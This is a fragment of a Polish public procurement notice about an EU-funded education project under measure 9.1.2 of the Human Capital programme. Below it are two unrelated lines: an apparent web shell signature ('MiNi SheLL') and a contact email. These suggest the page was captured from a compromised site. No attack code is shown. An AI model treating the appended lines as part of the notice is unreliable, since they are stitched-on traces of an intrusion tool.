<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie realizowane w  ramach Programu Operacyjnego Kapitał Ludzki, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie: 9.1.2 wyrównywanie szans edukacyjnych uczniów  z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych, w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com